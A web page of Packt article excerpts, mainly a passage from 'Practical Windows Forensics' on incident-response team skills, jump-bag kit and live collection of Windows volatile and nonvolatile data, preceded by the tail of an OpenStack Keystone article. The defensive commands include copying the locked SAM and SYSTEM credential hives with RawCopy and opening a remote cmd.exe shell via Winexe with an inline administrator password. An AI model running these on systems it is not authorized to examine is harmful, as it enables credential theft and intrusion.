is generated for authorization and access to an OpenStack environment. A token can have a variable lifespan, but the default value is 1 hour. It is also recommended to lower the lifespan of the token to a certain level so that within the specified timeframe the internal service can complete the task. If the token expires before task completion, the system can be unresponsive. Keystone also supports token revocation. For this, it uses an API to revoke a token and to list the revoked tokens. In OpenStack Newton release, there are four supported token types: UUID, PKI, PKIZ, and fernet. After the OpenStack Ocata release, there are two supported token types: UUID and fernet. 
We'll see all of these token types in detail here: UUID: These tokens are persistent tokens. UUID tokens are 32 bytes in length, which must be persisted in the backend. They are stored in the Keystone backend, along with the metadata for authentication. All of the clients must pass their UUID token to the Keystone (identity service) in order to validate it. PKI and PKIZ: These are signed documents that contain the authentication content, as well as the service catalog. The difference between the PKI and PKIZ is that PKIZ tokens are compressed to help mitigate the size issues of PKI (sometimes PKI tokens becomes very long). Both of these tokens have become obsolete after the Ocata release. The length of PKI and PKIZ tokens typically exceeds 1,600 bytes. The Identity service uses public and private key pairs and certificates in order to create and validate these tokens. Fernet: These tokens are the default supported token provider for OpenStack Pike Release. It is a secure messaging format explicitly designed for use in API tokens. They are nonpersistent, lightweight (fall in the range of 180 to 240 bytes), and reduce the operational overhead. Authentication and authorization metadata is neatly bundled into a message-packed payload, which is then encrypted and signed in as a fernet token. In the OpenStack, the Keystone Service domain is a high-level container for projects, users, and groups. Domains are used to centrally manage all Keystone-based identity components. Compute, storage, and other resources can be logically grouped into multiple projects, which can further be grouped under a master account. Users of different domains can be represented in different authentication backends and have different attributes that must be mapped to a single set of roles and privileges in the policy definitions to access the various service resources. Domain-specific authentication drivers allow the identity service to be configured for multiple domains, using domain-specific configuration files stored at keystone.conf. Federated identity Federated identity enables you to establish trusts between identity providers and the cloud environment (OpenStack Cloud). It gives you secure access to cloud resources using your existing identity. You do not need to remember multiple credentials to access your applications. Now, the question is, what is the reason for using federated identity? This is answered as follows: It enables your security team to manage all of the users (cloud or noncloud) from a single identity application It enables you to set up different identity providers on the basis of the application that somewhere creates an additional workload for the security team and leads the security risk as well It gives ease of life to users by proving them a single credential for all of the apps so that they can save the time they spend on the forgot password page Federated identity enables you to have a single sign-on mechanism. We can implement it using SAML 2.0. To do this, you need to run the identity service provider under Apache. We learned about securing your private cloud and the authentication process therein. If you've enjoyed this article, do check out 'Cloud Security Automation' for a hands-on experience of automating your cloud security and governance. Top 5 cloud security threats to look out for in 2018 Cloud Security Tips: Locking Your Account Down with AWS Identity Access Manager (IAM)
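To tie the authentication, token, and scoping concepts together, here is a minimal sketch in Python, assuming a Keystone v3 endpoint at http://controller:5000/v3 and a demo user and project (all of these names are placeholders for your own deployment): it requests a password-scoped token and reads it from the X-Subject-Token response header, which is what clients then present to the other OpenStack services.

import requests

KEYSTONE_URL = "http://controller:5000/v3/auth/tokens"  # placeholder endpoint

def get_scoped_token(username, password, project, domain="Default"):
    """Authenticate with the password method and return (token, token body)."""
    body = {
        "auth": {
            "identity": {
                "methods": ["password"],
                "password": {
                    "user": {
                        "name": username,
                        "domain": {"name": domain},
                        "password": password,
                    }
                },
            },
            "scope": {
                "project": {"name": project, "domain": {"name": domain}}
            },
        }
    }
    response = requests.post(KEYSTONE_URL, json=body)
    response.raise_for_status()
    # The token itself travels in a header; the body carries roles, catalog, and expiry.
    return response.headers["X-Subject-Token"], response.json()["token"]

if __name__ == "__main__":
    token, details = get_scoped_token("demo", "secret", "demo-project")
    print("token issued, expires at:", details["expires_at"])
    print("roles:", [role["name"] for role in details.get("roles", [])])

Whether the request succeeds, and which roles come back with the token, is what the per-service policy rules described earlier are evaluated against.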
Incident Response and Live Analysis

Packt
10 Jun 2016
30 min read
In this article by Ayman Shaaban and Konstantin Sapronov, author of the book Practical Windows Forensics, describe the stages of preparation to respond to an incident are a matter which much attention should be paid to. In some cases, the lack of necessary tools during the incident leads to the inability to perform the necessary actions at the right time. Taking into account that the reaction time of an incident depends on the efficiency of the incident handling process, it becomes clear that in order to prepare the IR team, its technical support should be very careful. The whole set of requirements can be divided into several categories for the IR team: Skills Hardware Software (For more resources related to this topic, see here.) Let's consider the main issues that may arise during the preparation of the incident response team in more detail. If we want to build a computer security incident response team, we need people with a certain set of skills and technical expertise to perform technical tasks and effectively communicate with other external contacts. Now, we will consider the skills of members of the team. The set of skills that members of the team need to have can be divided into two groups: Personal skills Technical skills Personal skills Personal skills are very important for a successful response team. This is because the interaction with team members who are technical experts but have poor social skills can lead to misunderstanding and misinterpretation of the results, the consequences of which may affect the team's reputation. A list of key personal skills will be discussed in the following sections. Written communication For many IR teams, a large part of their communication occurs through written documents. These communications can take many forms, including e-mails concerning incidents documentation of event or incident reports, vulnerabilities, and other technical information notifications. Incident response team members must be able to write clearly and concisely, describe activities accurately, and provide information that is easy for their readers to understand. Oral communication The ability to communicate effectively though spoken communication is also an important skill to ensure that the incident response team members say the right words to the right people. Presentation skills Not all technical experts have good presentation skills. They may not be comfortable in front of a large audience. Gaining confidence in presentation skills will take time and effort for the team's members to become more experienced and comfortable in such situations. Diplomacy The members of the incident response team interact with people who may have a variety of goals and needs. Skilled incident response team members will be able to anticipate potential points of contention, be able to respond appropriately, maintain good relationships, and avoid offending others. They also will understand that they are representing the IR team and their organization. Diplomacy and tact are very important. The ability to follow policies and procedures Another important skill that members of the team need is the ability to follow and support the established policies and procedures of the organization or team. Team skills IR staff must be able to work in the team environment as productive and cordial team players. They need to be aware of their responsibilities, contribute to the goals of the team, and work together to share information, workload, and experiences. 
They must be flexible and willing to adapt to change. They also need skills to interact with other parties. Integrity The nature of IR work means that team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. The team's members must be trustworthy, discrete, and able to handle information in confidence according to the guidelines, any constituency agreements or regulations, and/or any organizational policies and procedures. In their efforts to provide technical explanations or responses, the IR staff must be careful to provide appropriate and accurate information while avoiding the dissemination of any confidential information that could detrimentally affect another organization's reputation, result in the loss of the IR team's integrity, or affect other activities that involve other parties. Knowing one's limits Another important ability that the IR team's members must have is the ability to be able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management. Coping with stress The IR team's members often could be in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control and maintain their composure. In particular, they need the ability to remain calm in tense situations—ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and the individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled. Problem solving IR team members are confronted with data every day, and sometimes, the volume of information is large. Without good problem-solving skills, staff members could become overwhelmed with the volumes of data that are related to incidents and other tasks that need to be handled. Problem-solving skills also include the ability for the IR team's members to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data. Time management Along with problem-solving skills, it is also important for the IR team's members to be able to manage their time effectively. They will be confronted with a multitude of tasks ranging from analyzing, coordinating, and responding to incidents, to performing duties, such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing on-site technical support. Technical skills Another important component of the skills needed for an IR team to be effective is the technical skills of their staff. These skills, which define the depth and breadth of understanding of the technologies that are used by the team, and the constituency it serves, are outlined in the following sections. In turn, the technical skills, which the IR team members should have, can be divided into two groups: security fundamentals and incident handling skills. Security fundamentals Let's look at some of the security fundamentals in the following subsections. 
Security principles The IR team's members need to have a general understanding of the basic security principles, such as the following: Confidentiality Availability Authentication Integrity Access control Privacy Nonrepudiation Security vulnerabilities and weaknesses To understand how any specific attack is manifested in a given software or hardware technology, the IR team's members need to be able to first understand the fundamental causes of vulnerabilities through which most attacks are exploited. They need to be able to recognize and categorize the most common types of vulnerabilities and associated attacks, such as those that might involve the following: Physical security issues Protocol design flaws (for example, man-in-the-middle attacks or spoofing) Malicious code (for example, viruses, worms, or Trojan horses) Implementation flaws (for example, buffer overflow or timing windows/race conditions) Configuration weaknesses User errors or indifference The Internet It is important that the IR team's members also understand the Internet. Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in underlying protocols and services that are used on the Internet or to anticipate the threats that might occur in the future. Risks The IR team's members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks (such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data). Network protocols Members of the IR team need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency that they serve. For each protocol, they should have a basic understanding of the protocol, its specifications, and how it is used. In addition to this, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks. For example, at a minimum, the staff should be familiar with protocols, such as IP, TCP, UDP, ICMP, ARP, and RARP. They should understand how these protocols work, what they are used for, the differences between them, some of the common weaknesses, and so on. In addition to this, the staff should have a similar understanding of protocols, such as TFTP, FTP, HTTP, HTTPS, SNMP, SMTP, and any other protocols. The specialist skills include a more in-depth understanding of security concepts and principles in all the preceding areas in addition to expert knowledge in the mechanisms and technologies that lead to flaws in these protocols, the weaknesses that can be exploited (and why), the types of exploitation methods that would likely be used, and the strategies to mitigate or eliminate these potential problems. They should have expert understanding of additional protocols or Internet technologies (DNSSEC, IPv6, IPSEC, and other telecommunication standards that might be implemented or interface with their constituent's networks, such as ATM, BGP, broadband, voice over IP, wireless technology, other routing protocols, or new emerging technologies, and so on). They could then provide expert technical guidance to other members of the team or constituency. 
Network applications and services The IR team's staff need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, and so on). For each application or service they should understand the purpose of the application or service, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies. Network security issues The members of the IR team should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basic perimeter security of network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, and so on), router security, the potential for information disclosure of data traveling across the network (for example, packet monitoring or "sniffers"), or threats that are related to accepting untrustworthy information. Host or system security issues In addition to understanding security issues at a network level, the IR team's members need to understand security issues at a host level for the various types of operating systems (UNIX, Windows, or any other operating systems that are used by the team or constituency). Before understanding the security aspects, the IR team's member must first have the following: Experience using the operating system (user security issues) Some familiarity with managing and maintaining the operating system (as an administrator) Then, for each operating system, the IR team member needs to know how to perform the following: Configure (harden) the system securely Review configuration files for security weaknesses Identify common attack methods Determine whether a compromise attempt occurred Determine whether an attempted system compromise was successful Review log files for anomalies Analyze the results of attacks Manage system privileges Secure network daemons Recover from a compromise Malicious code The IR team's members must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, and so on). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multifaceted attack vectors. Staff should understand not only how malicious code is propagated through some of the obvious methods (disks, e-mail, programs, and so on), but they should also understand how it can propagate through other means, such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses that affect operating systems running on PC and Macintosh platforms. The IR team's staff must be aware of how such attacks occur and are propagated, the risks and damage associated with such attacks, prevention and mitigation strategies, detection and removal processes, and recovery techniques. Specialist skills include expertise in performing analysis, black box testing, reverse engineering malicious code that is associated with such attacks, and in providing advice to the team on the best approaches for an effective response. Programming skills Some team members need to have system and network programming experience. 
The team should ensure that a range of programming languages is covered on the operating systems that the team and the constituency use. For example, the team should have experience in the following: C Python Awk Java Shell (all variations) Other scripting tools These scripts or programming tools can be used to assist in the analysis and handling of incident information (for example, writing different scripts to count and sort through various logs, search databases, look up information, extract information from logs or files, and collect and merge data). Incident handling skills Local team policies and protocols Understanding and identifying intruder techniques Communication with sites Incident analysis Maintenance of incident records The hardware for IR and Jump Bag Certainly, a set of equipment that may be required during the processing of the incident should be prepared in advance, and this matter should be given much attention. This set is called the Jump Bag. The formation of such a kit is largely due to the budget the organization could afford. Nevertheless, there is a certain necessary minimum, which will allow the team to handle incidents in small quantities. If the budget allows it, it is possible to buy a turnkey solution, which includes all the necessary equipment and the case for its transportation. As an instance of such a solution, FREDL + Ultra Kit could be recommended. FREDL is short for Forensic Recovery of Evidence Device Laptop. With Ultra Kit, this solution will cost about 5000 USD. Ultra Kit contains a set of write-blockers and a set of adapters and connecters to obtain images of hard drives with a different interface: More details can be found on the manufacturer's website at https://www.digitalintelligence.com/products/ultrakit/. Certainly, if we ignore the main drawback of such a solution, this decision has a lot of advantages as compared to the cost. Besides this, you get a complete starter kit to handle the incident. Besides, Ultra Kit allows you to safely transport equipment without fear of damage. The FRED-L laptop is based on a modern hardware, and the specifications are constantly updated to meet modern requirements. Current specifications can be found on the manufacturer's website at http://www.digitalintelligence.com/products/fredl/. However, if you want to replace the expensive solution, you could build a cheaper alternative that will save 20-30% of the budget. It is possible to buy the components included in the review of decisions separately. As a workstation, you can choose a laptop with the following specifications: Intel Core i7-6700K Skylake Quad Core Processor, 4.0 GHz, 8MB Intel Smart Cache 16 GB PC4-17000 DDR4 2133 Memory 256 GB Solid State Internal SATA Drive Intel Z170 Express Chipset NVIDIA GeForce GTX 970M with 6 GB GDDR5 VRAM This specification will provide a comfortable workstation to work on the road. As a case study for the transport of the equipment, we recommend paying attention to Pelican (http://www.pelican.com) cases. In this case, the manufacturer can choose the equipment to meet your needs. One of the typical tasks in handling of incidents is obtaining images from hard drives. For this task, you can use a duplicator or a bunch of write-blockers and computer. Duplicators are certainly a more convenient solution; their usage allows you to quickly get the disk image without using additional software. Their main drawback is the price. 
However, if you often have to extract the image of hard drives and you have a few thousand dollars, the purchase of the duplicator is a good investment. If the imaging of hard drives is a relatively rare problem and you have a limited budget, you can purchase a write blocker which will cost 300-500 USD. However, it is necessary to use a computer and software. To pick up the necessary equipment, you can visit http://www.insectraforensics.com, where you can find equipment from different manufacturers. Also, do not forget about the hard drives themselves. It is worth buying a few hard drives with large volumes for the possibility of good performance. To summarize, responders need to include the following items in a basic set: Several network cables (straight through or loopback) A serial cable with a serial USB adapter Network serial adapters Hard drives (various sizes) Flash drives A Linux Live DVD A portable drive duplicator with a write-blocker Various drive interface adapters A four port hub A digital camera Cable ties Cable snips Assorted screws and hex drivers Notebooks and pens Chain of Custody forms Incident handling procedure Software After talking about the hardware, we did not forget about the software that you should always have on hand. The variety of software that can be used in the processing of the incident allows you to select software-based preferences, skills, and budget. Some prefer command-line utilities, and some find that GUI is more convenient to use. Sometimes, the use of certain tools is dictated by the circumstances under which it's needed to work. We strongly recommend that you prepare these in advance and thoroughly test the entire set of required software. Live versus mortem The initial reaction to an incident is a very important step in the process of computer incident management. The correct method of carrying out and performing this step depends on the success of the investigation. Moreover, a correct and timely response is needed to reduce the damage caused by the incident. The traditional approach to the analysis of the disks is not always practical, and in some cases, it is simply not possible. In today's world, the development of computer technology has led to many companies having a distribution network in many cities, countries, and continents. Wish this physical disconnection of the computer from the network, following the traditional investigation of each computer is not possible. In such cases, the incident responder should be able to carry out a prior assessment remotely and as soon as possible, view a list of running processes, open network connections, open files, and get a list of registered users in the system. Then, if necessary, carry out a full investigation. In this article, we will look at some approaches that the responder may apply in a given situation. However, even in these cases when we have physical access to the machine, live response is the only way of incident response. For example, cases where we are dealing with large disk arrays. In this case, there are several problems at once. The first problem is that the space to store large amounts of data is also difficult to identify. In addition to this, the time that may be required to analyze large amounts of data is unreasonably high. Typically, such large volumes of data have a highly loaded server serving hundreds of thousands of users, so their trip, or even a reboot, is not acceptable for business. 
Another scenario that requires the Live Forensics approach is when an encrypted filesystem is used. In cases where the analyst doesn't have the key to decrypt the disc, Live Forensics is a good alternative to obtain data from a system where encryption of the filesystem is used. This is not an exhaustive list of cases when the Live Analysis could be applicable. It is worth noting one very important point. During the Live Analysis, it is not possible to avoid changes in the system. Connecting external USB devices or network connectivity, user log on, or launching an executable file will be modified in the system in a variety of log files, registry keys, and so on. Therefore, you need to understand what changes were caused by the actions of responders and document them. Volatile data Under the principle of "order of Volatility", you must first collect information that is classified as Volatile Data (the list of network connections, the list of running processes, log on sessions, and so on), which will be irretrievably lost in case the computer is powered off. Then, you can start to collect nonvolatile data, which can also be obtained with the traditional approach in the analysis of the disk image. The main difference in this case is that a Live Forensics set of data is easier to obtain with a working machine. This article will focus on the collection of Volatile data. Typically, this category includes the following data: System uptime and the current time Network parameters (NetBIOS name cache, active connections, the routing table, and so on). NIC configuration settings Logged on users and active sessions Loaded drivers Running services Running processes and their related parameters (loaded DLLs, open handles, and ownership) Autostart modules Shared drives and files opened remotely Recording the time and date of the data collection allows you to define a time interval in which the investigator will perform an analysis of the system: (date / t) & (time / t)>%COMPUTER_NAME% systime.txt systeminfo | find "Boot Time" >>% COMPUTERNAME% systime.txt The last command allows you to< show how long the machine worked since the last reboot. Using the %COMPUTERNAME% environment variable, we can set up separate directories for each machine in case we need to repeat the process of collecting information on different computers in a network. In some cases, signs of compromise are clearly visible in the analysis of network activity. The next set of commands allows you to get this information: nbtstat -c> %COMPUTERNAME%NetNameCache.txt netstat -a -n -o>%COMPUTERNAME%NetStat.txt netstat -rn>%COMPUTNAME%NetRoute.txt ipconfig / all>%COMPUTERNAME%NIC.txt promqry>%COMPUTERNAME%NSniff.txt The first command uses nbtstat.exe to obtain information from the cache of NetBIOS. You display the NetBIOS names in their corresponding IP address. The second and third commands use netstat.exe to record all of the active compounds, listening ports, and routing tables. For information about network settings, the ipconfig.exe network interfaces command is used. The last block command starts the Microsoft promqry utility, which allows you to define the network interfaces on the local machine, which operates in promiscuous mode. This mode is required for network sniffers, so the detection of the regime indicates that the computer can run software that listens to network traffic. 
To enumerate all the logged on users on the computer, you can use the Sysinternals tools: psloggedon -x>%COMPUTERNAME% LoggedUsers.tx: logonsessions -p >> %COMPUTERNAME%LoggedOnUsers.txt The PsLoggedOn.exe command lists both types of users, those who are logged on to the computer locally, and those who logged on remotely over the network. Using the -x switch, you can get the time at which each user logged on. With the -p key, logonsessions will display all of the processes that were started by the user during the session. It should be noted that logonsessions must be run with administrator privileges. To get a list of all drivers that are loaded into the system, you can use the WDK drivers.exe utility: drivers.exe>%COMPUTERNAME%drivers.txt The next set of commands to obtain a list of running processes and related information is as follows: tasklist / svc>%COMPUTERNAME% taskdserv.txt psservice>%COMPUTERNAME% trasklst.txt tasklist / v>%COMPUTERNAME% taskuserinfo.txt pslist / t>%COMPUTERNAME%tasktree.txt listdlls>%COMPUTERNAME%lstdlls.txt handle -a>%COMPUTERNAME%lsthandles.txt The tasklist.exe utility that is made with the / svc key enumerates the list of running processes and services in their context. While the previous command displays a list of running services, PsService receives information on services using the information in the registry and SCM database. Services are a traditional way through which attackers can access a previously compromised system. Services can be configured to run automatically without user intervention, and they can be launched as part of another process, such as svchost.exe. In addition to this, remote access can be provided through completely legitimate services, such as telnet or ftp. To associate users with their running processes, use the tasklist / v command key. To enumerate a list of DLLs loaded in each process and the full path to the DLL, you can use listsdlls.exe from SysInternals. Another handle.exe utility can be used to list all the handles, which are open processes. This handles registry keys, files, ports, mutexes, and so on. Other utilities require run with administrator privileges. These tools can help identify malicious DLLs that were injected into the processes, as well as files, which have not been accessed by these processes. The next group of commands allows you to get a list of programs that are configured to start automatically: autorunsc.exe -a>%COMPUTERNAME% autoruns.txt at>%COMPUTERNAME% at.txt schtasks / query>%COMPUTERNAME% schtask.txt The first command starts the SysInternals utility, autoruns, and displays a list of executables that run at system startup and when users log on. This utility allows you to detect malware that uses the popular and well-known methods for persistent installation into the system. Two other commands (at and schtasks) display a list of commands that run in the schedule. To start the at command also requires administrator privileges. To install backdoors mechanisms, services are often used, but services are constantly working in the system and, thus, can be easily detected during live response. Thus, create a backdoor that runs on a schedule to avoid detection. For example, an attacker could create a task that will run the malware just outside working hours. 
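Rather than typing each command by hand during an incident, the volatile-data steps above can be scripted. The following is a minimal sketch in Python for a Windows host, assuming the built-in commands are available and that any Sysinternals or WDK utilities you add are already on the PATH of the response workstation; it runs a subset of the commands and writes each output into a per-host directory, mirroring the %COMPUTERNAME% convention used in the examples. The share and nonvolatile-data steps that follow can be added to the same dictionary.

import socket
import subprocess
from pathlib import Path

# A subset of the volatile-data commands discussed above; extend as needed.
COMMANDS = {
    "systime.txt": "date /t & time /t",
    "netstat.txt": "netstat -a -n -o",
    "netroute.txt": "netstat -rn",
    "nic.txt": "ipconfig /all",
    "tasksvc.txt": "tasklist /svc",
    "taskuserinfo.txt": "tasklist /v",
    "schtask.txt": "schtasks /query",
}

def collect(output_root="."):
    hostname = socket.gethostname()  # stands in for %COMPUTERNAME%
    outdir = Path(output_root) / hostname
    outdir.mkdir(parents=True, exist_ok=True)
    for filename, command in COMMANDS.items():
        # shell=True is required because these are cmd.exe built-ins and pipelines
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        (outdir / filename).write_text(result.stdout + result.stderr)
        print(f"collected {command!r} -> {outdir / filename}")

if __name__ == "__main__":
    collect()

Remember that running the collector itself changes the state of the system, so record when it was executed and what it touched, as discussed in the Live versus mortem section.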
To get a list of shared network drives and files opened remotely, you can use the following two commands:

psfile > %COMPUTERNAME%\openfileremote.txt
net share > %COMPUTERNAME%\drives.txt

Nonvolatile data

After the volatile data has been collected, you can continue to collect nonvolatile data. This data can be obtained at the stage of analyzing the disk, but as we mentioned earlier, analysis of the disk is not possible in some cases. This data includes the following:

The list of installed software and updates
User info
Metadata about a filesystem's timestamps
Registry data

However, when collecting this data from a live, running system, there is a difficulty: many of these files cannot be copied in the usual way because they are locked by the operating system. To work around this, you can use a dedicated utility. One such utility is RawCopy.exe, authored by Joakim Schicht. This is a console application that copies files off NTFS volumes using a low-level disk reading method. The application has two mandatory parameters, the target file and the output path:

-param1: This is the full path to the target file to extract; it also supports IndexNumber instead of a file path
-param2: This is a valid path to the output directory

This tool lets you copy files that are usually not accessible because the system has locked them: for instance, registry hives such as SYSTEM and SAM, files inside SYSTEM VOLUME INFORMATION, or any other file on the volume. The input file can be specified either with the full file path or by its $MFT record number (index number).

Here's an example of copying the SYSTEM hive off a running system:

RawCopy.exe C:\WINDOWS\system32\config\SYSTEM %COMPUTERNAME%\SYSTEM

Here's an example of extracting the $MFT by specifying its index number:

RawCopy.exe C:0 %COMPUTERNAME%\mft

Here's an example of extracting MFT reference number 30224 with all attributes, including $DATA, and dumping it into C:\tmp:

RawCopy.exe C:30224 C:\tmp -AllAttr

To download RawCopy, go to https://github.com/jschicht/RawCopy.

Knowing what software is installed, and which updates have been applied, helps further the investigation because it shows possible ways the system could have been compromised through a vulnerability in the software. One of the first actions an attacker takes is to scan the system to detect active services and exploit the vulnerabilities in them. Thus, services that were not patched can be utilized for remote system penetration. One way to list the installed software and updates is to use the systeminfo utility:

systeminfo > %COMPUTERNAME%\sysinfo.txt

Moreover, skilled attackers can perform the same actions themselves and install the necessary updates in order to hide the traces of their penetration into the system. After identifying vulnerable services and successfully exploiting them, the attacker often creates an account for themselves in order to subsequently enter the system through legitimate means.
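Because a newly created account is such a common follow-up to a successful exploit, it can be worth snapshotting the local accounts and the local Administrators group during the same collection run. The following commands are standard Windows tools rather than part of the toolkit listed above, and the output file names are illustrative:

net user > %COMPUTERNAME%\local_users.txt
net localgroup administrators > %COMPUTERNAME%\local_admins.txt
wmic useraccount get name,sid,disabled /format:list > %COMPUTERNAME%\user_sids.txt

Comparing this snapshot against the organization's expected account list can quickly reveal accounts that were added after the compromise.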
Therefore, the analysis of data about the users of the system can reveal the following traces of a compromise:

The Recent folder contents, including LNK files and jump lists
LNK files in the Office Recent folder
The Network Recent folder contents
The entire Temp folder
The entire Temporary Internet Files folder
The PrivacIE folder
The Cookies folder
The Java Cache folder contents

Now, let's consider the preceding cases as follows:

Collecting the Recent folder is done as follows:

robocopy.exe "%RECENT%" %COMPUTERNAME%\Recent /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Recent\log.txt

Here, %RECENT% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%RECENT% = %systemdrive%\Documents and Settings\%USERNAME%\Recent

For Windows 6.x (Windows Vista and newer), this is as follows:

%RECENT% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent

Collecting the Office Recent folder is done as follows:

robocopy.exe "%RECENT_OFFICE%" %COMPUTERNAME%\Recent_Office /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Recent_Office\log.txt

Here, %RECENT_OFFICE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%RECENT_OFFICE% = %systemdrive%\Documents and Settings\%USERNAME%\Application Data\Microsoft\Office\Recent

For Windows 6.x (Windows Vista and newer), this is as follows:

%RECENT_OFFICE% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent

Collecting the Network Shares Recent folder is done as follows:

robocopy.exe "%NetShares%" %COMPUTERNAME%\NetShares /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\NetShares\log.txt

Here, %NetShares% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%NetShares% = %systemdrive%\Documents and Settings\%USERNAME%\NetHood

For Windows 6.x (Windows Vista and newer), this is as follows:

%NetShares% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Network Shortcuts

Collecting the Temporary folder is done as follows:

robocopy.exe "%TEMP%" %COMPUTERNAME%\TEMP /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\TEMP\log.txt

Here, %TEMP% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%TEMP% = %systemdrive%\Documents and Settings\%USERNAME%\Local Settings\Temp

For Windows 6.x (Windows Vista and newer), this is as follows:

%TEMP% = %systemdrive%\Users\%USERNAME%\AppData\Local\Temp

Collecting the Temporary Internet Files folder is done as follows:

robocopy.exe "%TEMP_INTERNET_FILES%" %COMPUTERNAME%\TEMP_INTERNET_FILES /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\TEMP_INTERNET_FILES\log.txt

Here, %TEMP_INTERNET_FILES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%TEMP_INTERNET_FILES% = %systemdrive%\Documents and Settings\%USERNAME%\Local Settings\Temporary Internet Files

For Windows 6.x (Windows Vista and newer), this is as follows:

%TEMP_INTERNET_FILES% = %systemdrive%\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files

Collecting the PrivacIE folder is done as follows:

robocopy.exe "%PRIVACYIE%" %COMPUTERNAME%\PrivacIE /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\PrivacIE\log.txt

Here, %PRIVACYIE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%PRIVACYIE% = %systemdrive%\Documents and Settings\%USERNAME%\PrivacIE

For Windows 6.x (Windows Vista and newer), this is as follows:

%PRIVACYIE% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PrivacIE

Collecting the Cookies folder is done as follows:

robocopy.exe "%COOKIES%" %COMPUTERNAME%\Cookies /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\Cookies\log.txt

Here, %COOKIES% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%COOKIES% = %systemdrive%\Documents and Settings\%USERNAME%\Cookies

For Windows 6.x (Windows Vista and newer), this is as follows:

%COOKIES% = %systemdrive%\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies

Collecting the Java Cache folder is done as follows:

robocopy.exe "%JAVACACHE%" %COMPUTERNAME%\JAVACACHE /ZB /copy:DAT /r:0 /ts /FP /np /E /log:%COMPUTERNAME%\JAVACACHE\log.txt

Here, %JAVACACHE% depends on the version of Windows. For Windows 5.x (Windows 2000, Windows XP, and Windows 2003), this is as follows:

%JAVACACHE% = %systemdrive%\Documents and Settings\%USERNAME%\Application Data\Sun\Java\Deployment\cache

For Windows 6.x (Windows Vista and newer), this is as follows:

%JAVACACHE% = %systemdrive%\Users\%USERNAME%\AppData\LocalLow\Sun\Java\Deployment\cache

Remote live response

However, as mentioned earlier, it is often necessary to carry out the collection of information remotely. On Windows systems, this is often done using the Sysinternals PsExec utility. PsExec lets you execute commands on remote computers and does not require the manual installation of any software on the remote system. The psexec.exe executable contains another executable, psexesvc.exe, embedded as a resource; this file runs as a Windows service on the target machine. Before executing the command, PsExec unpacks this hidden resource to the administrative share Admin$ (C:\Windows) of the remote computer, as Admin$\system32\psexesvc.exe. After copying it, PsExec installs and runs the service using the Windows service management API functions. Then, after psexesvc has started, a data connection (for sending commands and getting results) is established between psexesvc and psexec. Upon completion of the work, psexec stops the service and removes it from the target computer.

If the collection has to be performed from a machine running a UNIX-like OS, the Winexe utility can be used. Winexe is a GNU/Linux-based application that allows users to execute commands remotely on Windows NT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows the execution of most Windows shell commands:

winexe -U [Domain/]User%Password //host command

To launch a Windows shell from inside your Linux system, use the following command:

winexe -U HOME/Administrator%Pass123 //192.168.0.1 "cmd.exe"

Summary

In this article, we discussed what we should have in the jump bag to handle a computer incident, and what kind of skills the members of the IR team require. We also took a look at live response and collected volatile and nonvolatile information from a live system, discussed different tools for collecting this information, and covered when we should use a live response approach as an alternative to traditional forensics.
Resources for Article: Further resources on this subject: BackTrack Forensics [article] Mobile Phone Forensics – A First Step into Android Forensics [article] Forensics Recovery [article]
Processing the Case

Packt
18 Mar 2014
4 min read
(For more resources related to this topic, see here.)

Changing the time zone

